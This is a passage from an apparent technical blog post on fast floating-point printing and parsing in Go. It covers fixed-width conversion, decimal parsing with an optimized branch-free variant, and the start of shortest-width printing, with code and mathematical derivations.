return (x * 108853) >> 15
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L84-L87">fpfmt/fpfmt.go:84,87</a></div><div class=showcode-end></div>
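<p>
As a quick sanity check (a sketch of my own, not from the post), we can compare both fixed-point approximations against the floating-point logarithms over the exponent ranges these conversions use, which I assume to be roughly |x| ≤ 1100 for binary exponents and |p| ≤ 350 for decimal exponents, and report any mismatch:
<pre>func checkLogApprox() {
	for x := -1100; x <= 1100; x++ {
		if want := int(math.Floor(float64(x) * math.Log10(2))); log10Pow2(x) != want {
			fmt.Printf("log10Pow2(%d) = %d, want %d\n", x, log10Pow2(x), want)
		}
	}
	for p := -350; p <= 350; p++ {
		if want := int(math.Floor(float64(p) * math.Log2(10))); log2Pow10(p) != want {
			fmt.Printf("log2Pow10(%d) = %d, want %d\n", p, log2Pow10(p), want)
		}
	}
}
</pre>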
<p>
Now we can put everything together:
<div class=showcode><pre><span class=showcode-comment>// FixedWidth returns the n-digit decimal form of f as d * 10**p.</span>
<span class=showcode-comment>// n can be at most 18.</span>
func FixedWidth(f float64, n int) (d uint64, p int) {
if n > 18 {
panic("too many digits")
}
m, e := unpack64(f)
p = n - 1 - log10Pow2(e+63)
u := uscale(m, prescale(e, p, log2Pow10(p)))
d = u.round()
if d >= uint64pow10[n] {
d, p = u.div(10).round(), p-1
}
return d, -p
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L96-L109">fpfmt/fpfmt.go:96,109</a></div><div class=showcode-end></div>
<p>
That’s the entire conversion!
<p>
The code splits <math><mi>f</mi></math> into <math><mi>m</mi></math>, <math><mi>e</mi></math>;
computes <math><mi>p</mi></math> as just described;
and then uses <code>uscale</code> and <code>round</code> to compute
<math><mrow><mi>d</mi><mo>=</mo><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
If the result has an extra digit,
either because our approximate log made <math><mi>p</mi></math> too big,
or because of rollover during rounding,
we divide the unrounded form by 10, round again, and update <math><mi>p</mi></math>.
When we approximated <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi></mrow></math> by counting bits,
we used the exact log of the greatest power of two less than or equal to <math><mi>m</mi></math>,
so the computed <math><mi>d</mi></math> must be less than twice the intended limit <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>n</mi></msup></mrow></math>,
meaning the leading digit (if there are too many digits) must be 1.
And rollover only happens for ‘<math><mrow><mn>999</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /></mrow></math>’,
so it is not possible to have both an extra digit and rollover.
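<p>
Both correction cases are easy to trigger (a usage sketch, assuming the functions above): <code>FixedWidth(15, 2)</code> takes the extra-digit path because the bit-counting approximation makes <math><mi>p</mi></math> one too big, and <code>FixedWidth(9.9999, 3)</code> takes it because 999.99 rounds up to 1000. Both still return correctly rounded results:
<pre>d, p := FixedWidth(15, 2)
fmt.Println(d, p) // 15 0 (scaling gave 150, one digit too many, so we divided by 10)
d, p = FixedWidth(9.9999, 3)
fmt.Println(d, p) // 100 -1 (999.99 rounded up to 1000, so we divided by 10)
</pre>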
<p>
As an example conversion,
consider a float64 approximation of <math><mi>π</mi></math> (<math><mrow><mtext><code>0x1921fb54442d18</code></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>51</mn></mrow></msup></mrow></math>) to 15 decimal digits.
We have <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>51</mn></mrow></math>, <math><mrow><mi>n</mi><mo>=</mo><mn>15</mn></mrow></math>, and <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo><mo>=</mo><mn>53</mn></mrow></math>,
so <math><mrow><mi>p</mi><mo>=</mo><mi>n</mi><mo>−</mo><mn>1</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>⌋</mo></mrow><mo>=</mo><mn>14</mn></mrow></math>.
<p>
The <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>51</mn></mrow></msup></mrow></math> and <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>14</mn></mrow></msup></mrow></math> scales align like this:
<p>
<img name="fpfmt-ruler-pi" class="center pad" width=340 height=190 src="fpfmt-ruler-pi.svg">
<p>
Then <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mtext><code>0x1921fb54442d18</code></mtext><mo>,</mo><MO form='prefix'>−</MO><mn>51</mn><mo>,</mo><mn>14</mn><mo stretchy=false>)</mo></mrow></math> returns the unrounded number ‘314159265358979.0+’,
which rounds to 314159265358979.
Our answer is then <math><mrow><mn>314159265358979</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>14</mn></mrow></msup></mrow></math>.
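<p>
In code (a usage sketch, assuming the functions above), that conversion is:
<pre>d, p := FixedWidth(math.Pi, 15)
fmt.Println(d, p) // 314159265358979 -14
</pre>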
<a class=anchor href="#parsing_decimals"><h2 id="parsing_decimals">Parsing Decimals</h2></a>
<p>
Unrounded scaling also lets us parse decimal representations of floating-point numbers efficiently.
Let’s assume we’ve taken care of parsing a string like ‘1.23e45’
and now have an integer and exponent like <math><mrow><mi>d</mi><mo>=</mo><mn>123</mn></mrow></math>, <math><mrow><mi>p</mi><mo>=</mo><mn>45</mn><mo>−</mo><mn>2</mn><mo>=</mo><mn>43</mn></mrow></math>.
To convert <math><mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> to a float64,
we can choose an appropriate <math><mi>e</mi></math> so that <math><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math>
and then return <math><mrow><mo stretchy=false>[</mo><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>d</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo><mo stretchy=false>]</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>e</mi></mrow></msup></mrow></math>.
<p>
The derivation of <math><mi>e</mi></math> is similar to the derivation of <math><mi>p</mi></math> for printing:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>·</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[factoring</mtext><mspace width='0.3em' /><mtext>range]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>)</mo><mo>+</mo><mi>e</mi></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[taking</mtext><mspace width='0.3em' /><mtext>log]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>e</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>−</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>)</mo><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[isolating</mtext><mspace width='0.3em' /></mrow><mi>e</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>e</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>−</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>)</mo><mo>−</mo><mo 
stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[regrouping]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>e</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mi>p</mi><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>e</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>52</mn><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo stretchy=false>)</mo><mo>+</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><mo stretchy=false>)</mo><mo>·</mo><mi>p</mi><mo stretchy=false>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[changing</mtext><mspace width='0.3em' /><mtext>log</mtext><mspace width='0.3em' /><mtext>base]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
Once again, it is okay to overestimate <math><mi>e</mi></math>, so we can approximate
<math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi><mo>=</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>d</mi><mo stretchy=false>)</mo><mo>−</mo><mn>1</mn></mrow></math>, yielding <math><mrow><mi>e</mi><mo>=</mo><mn>53</mn><mo>−</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>d</mi><mo stretchy=false>)</mo><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><mo stretchy=false>)</mo><mo>·</mo><mi>p</mi><mo stretchy=false>⌋</mo></mrow></mrow></math>.
If <math><mi>e</mi></math> is very large, the final exponent <math><mrow><mo>−</mo><mi>e</mi></mrow></math> will be very negative,
meaning we will be creating a subnormal,
so we need to round to a smaller number of bits.
To handle this, we cap <math><mi>e</mi></math> at 1074,
which caps <math><mrow><mo>−</mo><mi>e</mi></mrow></math> at <math><mrow><mo>−</mo><mn>1074</mn></mrow></math>.
As before, due to the approximation of <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>d</mi></mrow></math>, the scaled result is at most twice as large as our target,
meaning it might have one extra bit to shift away.
<div class=showcode><pre><span class=showcode-comment>// Parse rounds d * 10**p to the nearest float64 f.</span>
<span class=showcode-comment>// d can have at most 19 digits.</span>
func Parse(d uint64, p int) float64 {
if d >= 1e19 {
panic("too many digits")
}
b := bits.Len64(d)
e := min(1074, 53-b-log2Pow10(p))
u := uscale(d<<(64-b), prescale(e-(64-b), p, log2Pow10(p)))
m := u.round()
if m >= 1<<53 {
m, e = u.rsh(1).round(), e-1
}
return pack64(m, -e)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L111-L124">fpfmt/unopt/fpfmt.go:111,124</a></div><div class=showcode-end></div>
<p>
<code>FixedWidth</code> and <code>Parse</code> demonstrate
exactly how similar printing and parsing really are.
In printing, we are given <math><mi>m</mi></math>, <math><mi>e</mi></math> and
find <math><mi>p</mi></math>; then <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>m</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> converts binary to decimal.
In parsing, we are given <math><mi>d</mi></math>, <math><mi>p</mi></math> and find <math><mi>e</mi></math>;
then <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>d</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> converts decimal to binary.
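<p>
That symmetry also gives a direct round-trip check (again a usage sketch, assuming the functions above): since 17 digits uniquely identify a float64, printing at that width and parsing the result must reproduce the original value.
<pre>d, p := FixedWidth(math.Pi, 17)
f := Parse(d, p)
fmt.Println(d, p, f == math.Pi) // 31415926535897931 -16 true
</pre>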
<p>
We can make parsing a little faster with a few hand optimizations.
This optimized version introduces <code>lp</code> to avoid calling <code>log2Pow10</code> twice,
and it implements the extra bit handling in branch-free code.
<div class=showcode><pre><span class=showcode-comment>// Parse rounds d * 10**p to the nearest float64 f.</span>
<span class=showcode-comment>// d can have at most 19 digits.</span>
func Parse(d uint64, p int) float64 {
if d >= 1e19 {
panic("too many digits")
}
b := bits.Len64(d)
lp := log2Pow10(p)
e := min(1074, 53-b-lp)
u := uscale(d<<(64-b), prescale(e-(64-b), p, lp))
<span class=showcode-comment>// This block is branch-free code for:</span>
<span class=showcode-comment>// if u.round() >= 1<<53 {</span>
<span class=showcode-comment>// u = u.rsh(1)</span>
<span class=showcode-comment>// e = e - 1</span>
<span class=showcode-comment>// }</span>
s := bool2[int](u >= unmin(1<<53))
u = (u >> s) | u&1
e = e - s
return pack64(u.round(), -e)
}
<span class=showcode-comment>// unmin returns the minimum unrounded that rounds to x.</span>
func unmin(x uint64) unrounded {
return unrounded(x<<2 - 2)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L112-L137">fpfmt/fpfmt.go:112,137</a></div><div class=showcode-end></div>
<p>
Now we are ready for our next challenge: shortest-width printing.
<a class=anchor href="#shortest-width_printing"><h2 id="shortest-width_printing">Shortest-Width Printing</h2></a>
<p>
Shortest-width printing means to prepare a decimal representation
that a floating-point parser would convert back to the exact same <code>float64</code>,
using as few digits as possible.
When there are multiple possible shortest decimal outputs,
we insist on the one that is nearest the original input,
namely the correctly-rounded one.
In general, 17 digits are always enough to uniquely identify a <code>float64</code>,
but sometimes fewer can be used, even down to a single digit in numbers like 1, 2e10, and 3e−42.
<p>
An obvious approach would be to use <code>FixedWidth</code> for increasing values of <code>n</code>,
stopping when <code>Parse(FixedWidth(f, n)) == f</code>.
Or maybe we should derive an equation for <code>n</code> and then use <code>FixedWidth(f, n)</code> directly.
Surprisingly, neither approach works:
<code>Short(f)</code> is not necessarily <code>FixedWidth(f, n)</code> for some <code>n</code>.
The simplest demonstration of this is <math><mrow><mi>f</mi><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>89</mn></msup><mo>=</mo><mn>6189700196426901</mn><mspace width='0.166em' /><mn>37449562112</mn><mo>=</mo><mtext><code>0x10000000000000</code></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>37</mn></msup></mrow></math>,
which looks like this:
<p>
<img name="fpfmt-ruler-skew" class="center pad" width=370 height=190 src="fpfmt-ruler-skew.svg">
<p>
Because <math><mi>f</mi></math> is a power of two, the floating-point exponent
changes at <math><mi>f</mi></math>,
as does the spacing between floating-point numbers.
The next smallest value is <math><mrow><mtext><code>0x1fffffffffffff</code></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>36</mn></msup></mrow></math>,
marked on the diagram as <math><mrow><mtext><code>0xfffffffffffff½</code></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>37</mn></msup></mrow></math>.
The dotted lines mark the halfway points between <math><mi>f</mi></math>
and its nearest floating point neighbors.
The accurate decimal answers are those at or between the dotted lines,
all of which convert back to <math><mi>f</mi></math>.
<p>
The correct rounding of <math><mi>f</mi></math> to 16 digits ends in …901: the next digit in <math><mi>f</mi></math> is 3,
so we should round down.
However, because of the spacing change around <math><mi>f</mi></math>,
that correct decimal rounding does not convert back to <math><mi>f</mi></math>.
A <code>FixedWidth</code> loop would choose a 17-digit form instead.
But there is an accurate 16-digit form, namely …902.
That decimal is closer to <math><mi>f</mi></math> than it is to any other float64,
making it an accurate <math><mi>d</mi></math>.
And since the closer 16-digit value …901 is not an accurate <math><mi>d</mi></math>,
<code>Short</code> should use …902 instead.
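<p>
The paradox is easy to reproduce (a usage sketch, assuming the functions above): the correctly rounded 16-digit form ends in …901 and does not parse back to <math><mi>f</mi></math>, while …902 does.
<pre>f := math.Ldexp(1, 89) // 2**89
d, p := FixedWidth(f, 16)
fmt.Println(d, p)               // 6189700196426901 11
fmt.Println(Parse(d, p) == f)   // false: …901 parses to the float64 below f
fmt.Println(Parse(d+1, p) == f) // true: …902 parses back to f
</pre>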
<p>
Assuming as usual that <math><mrow><mi>f</mi><mo>=</mo><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>,
let’s define
<math><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo></mrow></math>
to be the distance between the midpoints from <math><mi>f</mi></math> to its
floating-point neighbors.
Normally those neighbors are <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>
in either direction—the midpoints are <math><mrow><mo stretchy=false>(</mo><mi>m</mi><mo>±</mo><mn>½</mn><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>—so
<math><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>.
At a power of two with an exponent change,
the lower midpoint is instead <math><mrow><mo stretchy=false>(</mo><mi>m</mi><mo>−</mo><mn>¼</mn><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>,
so <math><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>=</mo><mn>¾</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>.
The rounding paradox can only happen for powers of two
with this kind of skewed footprint.
<p>
All that is to say we cannot use <code>FixedWidth</code> with “the right <math><mi>n</mi></math>”.
But we can use uscale directly with “the right <math><mi>p</mi></math>.”
Specifically, we can compute the midpoints between <math><mi>f</mi></math>
and its floating-point neighbors
and scale them to obtain the
minimum and maximum valid choices for <math><mi>d</mi></math>.
Then we can make the best choice:
<ul>
<li>
If one of the valid <math><mi>d</mi></math> ends in 0, use it after removing trailing zeros. <br>
(Choosing the right <math><mi>p</mi></math> will allow at most ten consecutive integers,
so at most one will end in 0.)
<li>
If there is only one valid <math><mi>d</mi></math>, use it.
<li>
Otherwise there are at least two valid <math><mi>d</mi></math>, at least one on each side of <math><mi>f</mi></math>;
use the correctly rounded one.</ul>
<p>
Here is an example of the first case: one of the valid <math><mi>d</mi></math> ends in zero.
<p>
<img name="fpfmt-ruler-trimzero" class="center pad" width=370 height=190 src="fpfmt-ruler-trimzero.svg">
<p>
We already saw an example of the second case: only one valid <math><mi>d</mi></math>.
For numbers with symmetric footprints, that will be the
correctly rounded <math><mi>d</mi></math>.
As we saw for numbers with skewed footprints,
that may not be the correctly rounded <math><mi>d</mi></math>,
but it is still the correct answer.
<p>
Finally, here is an example of the third case: multiple valid <math><mi>d</mi></math>,
but none that end in zero.
Now we should use the correctly rounded one.
<p>
<img name="fpfmt-ruler-many" class="center pad" width=370 height=190 src="fpfmt-ruler-many.svg">
<p>
This sounds great, but how do we determine the right <math><mi>p</mi></math>?
We want the scaled footprint <math><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> to contain at least one decimal integer,
but at most ten, meaning <math><mrow><mn>1</mn><mo>≤</mo><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo><</mo><mn>10</mn></mrow></math>.
Luckily, we can hit that target exactly.
<p>
For a symmetric footprint:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd><mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mn>1/2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[isolating</mtext><mspace width='0.3em' /></mrow><mi>p</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo>)</mo></mrow><mo>·</mo><mi>e</mi><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[taking</mtext><mspace width='0.3em' /><mtext>log]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>(</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>−</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo><mo>)</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[regrouping]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>⌊</mo><mo 
stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mi>p</mi><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr></mtable></math></div>
<p>
For a skewed footprint:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mn>¾</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: 